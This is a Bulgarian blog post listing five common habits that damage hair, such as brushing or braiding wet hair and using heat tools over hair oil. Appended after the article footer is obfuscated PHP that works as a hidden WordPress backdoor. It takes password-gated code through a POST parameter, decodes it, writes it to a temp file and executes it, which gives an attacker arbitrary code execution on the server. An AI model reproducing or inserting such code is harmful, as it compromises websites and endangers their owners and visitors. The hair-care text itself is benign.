5 грешки, с които си увреждаме косата | Косопад

5 грешки, с които си увреждаме косата

kosa-shampoan-1

Всяка жена иска да има красива коса, но често се случва, да й вреди, без да осъзнава.

Нека разгледаме някои от най- честите грешки и как можем да ги избегнем, за да не вредим на косата си сами:

1 Четката

Най- добрите четки за коса са с глигански косъм. За ежедневно ресане обаче, тези четки не са подходящи, тъй като могат да увредят косъма. А за мокра коса – са напълно забранени.

По- добре използвайте четка с найлонови зъби, които се адаптират към косъма, тъй като са гъвкави и улесняват ресането. Мократа коса е особено крехка, така че трябва да я решите много внимателно. Четката с глигански косъм може да се използва за оформяне на прически.

2 Връзване или сплитане на косата, когато е мокра

Знаем, че е най- добре плитките да се правят, когато косата е мокра, защото тогава по- лесно се пипа и моделира. Мократа коса е с 50% по- еластична. Но това предимство е оръжие с двойно предназначение. Когато косата е сплетена на мокро, косъмът не може да заеме обичайната си форма. След часове, косата се опитва да се върне към формата си, но не може и се опъва още повече. Така може да се накъса.

Избягвайте да правите прически с мократа си коса. Използвайте хидратиращи продукти, както и маска веднъж седмично.

kosa-kokosovo-maslo

3 Масла за коса

Те са много полезни продукти за косата ни. Но често допускаме следната грешка: нанасяме маслото и след това обработваме с топлинен уред. Това е много вредно за косата. Използвайте спрей, който предпазва от високи температури, преди да използвате уреда.

4 Разресване от горе на долу

Когато косата ни е заплетена, започваме да я разресваме от корена към върховете. Но така възлите стават още по- здрави. Накрая стигаме до толкова здраво топче, че е невъзможно да го разплетен. Често нямаме друг изход, освен да го клъцнем с ножицата.

5 Ресане на мокра коса

След баня, косата е мокра и разрошена. Иска ни се много да я приведем във вид и да я срешем. Но, както вече казахме, мократа коса е много уязвима, и ресането или оформянето с уред я увреждат много сериозно.

01. декември 2016 16:33:31 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}